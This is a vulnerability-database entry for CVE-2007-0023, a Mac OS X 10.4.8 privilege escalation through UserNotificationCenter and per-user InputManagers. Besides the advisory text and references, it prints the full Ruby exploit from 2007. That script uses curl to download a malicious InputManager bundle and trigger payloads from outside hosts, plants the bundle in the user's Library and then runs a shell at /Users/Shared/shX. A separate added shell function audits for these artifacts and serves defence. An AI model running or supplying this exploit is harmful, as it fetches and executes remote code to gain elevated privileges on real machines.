Apple UserNotificationCenter Local Privilege Escalation Vulnerability

Vulnerability ID: 1112062
Vulnerability type: Design error
Published: 2007-01-23
Updated: 2007-02-20
CVE ID: CVE-2007-0023
CNNVD-ID: CNNVD-200701-405
Platform: OSX
CVSS score: 6.9
|Vulnerability Sources
https://www.exploit-db.com/exploits/3181
https://www.securityfocus.com/bid/22188
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-405
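|Vulnerability Details
Mac OS X is the operating system used on Apple's family of machines. The UserNotificationCenter.app utility in Mac OS X has a flaw in its privilege handling that a local attacker may be able to exploit to elevate privileges. When combined with diskutil, the CFUserNotificationSendRequest function in UserNotificationCenter.app runs arbitrary InputManagers from the user's home directory with wheel group privileges, which may allow a local attacker to execute arbitrary code with wheel privileges.
|Exploit (EXP)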
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#                    Lance M. Havok   <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#

require 'fileutils'

bugselected = (ARGV[0] || 0).to_i

# INPUTMANAGER_URL    = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL    = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/3181.tar.gz"
INPUTMANAGER_PLANT  = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};"             +
                      "mkdir -p ~/Library/InputManagers/;"                                    +
                      "cd ~/Library/InputManagers/;"                                          +
                      "tar -zxvf /tmp/moab_im.tar.gz"

case bugselected
  when 0
    target_url  = "http://projects.info-pull.com/moab/bug-files/notification"
    trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
  when 1
    target_url  = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
    trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
  when 2
    target_url  = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
    trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end

CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"

def escalate()
  puts "++ Welcome to Pwndertino..."
  system CMD_LINE
  sleep 5
  system "/Users/Shared/shX" 
end

escalate()

# milw0rm.com [2007-01-23]
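
A defensive check for the artifacts this exploit leaves behind, added here as an example and not part of the original advisory or exploit: it lists every per-user InputManagers entry and the fixed paths the script above writes or runs. The function name, the ROOT parameter and the output labels are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a filesystem tree for planted
# InputManagers and for the fixed paths used by the exploit script on this page.

# audit_inputmanagers ROOT
#   ROOT defaults to "/"; passing another directory lets the check run against
#   a constructed test tree.
#   Prints one line per finding. Returns 1 if anything was found, 0 if clean.
audit_inputmanagers() {
    root="${1:-/}"
    root="${root%/}"        # "/" becomes "", so the joined paths stay well-formed
    found=0

    # 1. Per-user InputManagers. Per the description above, bundles planted
    #    here are what ends up running with wheel group privileges, so every
    #    entry should be one the account owner knowingly installed.
    for dir in "$root"/Users/*/Library/InputManagers; do
        [ -d "$dir" ] || continue
        for entry in "$dir"/*; do
            [ -e "$entry" ] || continue
            echo "INPUTMANAGER ${entry#"$root"}"
            found=1
        done
    done

    # 2. Fixed paths the exploit script on this page downloads to or executes.
    for path in /tmp/moab_im.tar.gz /tmp/notify /Users/Shared/shX; do
        if [ -e "$root$path" ]; then
            echo "ARTIFACT $path"
            found=1
        fi
    done

    return "$found"
}
```

Call `audit_inputmanagers /` on the host being checked; a non-zero return means at least one line of output needs review.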
|Affected Products
Apple Mac OS X Server 10.4.8
Apple Mac OS X 10.4.8
|References

Source: US-CERT
Name: TA07-047A
Link: http://www.us-cert.gov/cas/techalerts/TA07-047A.html
Source: US-CERT
Name: VU#315856
Link: http://www.kb.cert.org/vuls/id/315856
Source: MISC
Link: http://projects.info-pull.com/moab/MOAB-22-01-2007.html
Source: XF
Name: macos-inputmanager-privilege-escalation(31676)
Link: http://xforce.iss.net/xforce/xfdb/31676
Source: BID
Name: 22188
Link: http://www.securityfocus.com/bid/22188
Source: OSVDB
Name: 32695
Link: http://www.osvdb.org/32695
Source: VUPEN
Name: ADV-2007-0074
Link: http://www.frsirt.com/english/advisories/2007/0074
Source: SECTRACK
Name: 1017542
Link: http://securitytracker.com/id?1017542
Source: SECUNIA
Name: 24198
Link: http://secunia.com/advisories/24198
Source: SECUNIA
Name: 23846
Link: http://secunia.com/advisories/23846
Source: APPLE
Name: APPLE-SA-2007-02-15
Link: http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html
Source: docs.info.apple.com
Link: http://docs.info.apple.com/article.html?artnum=305102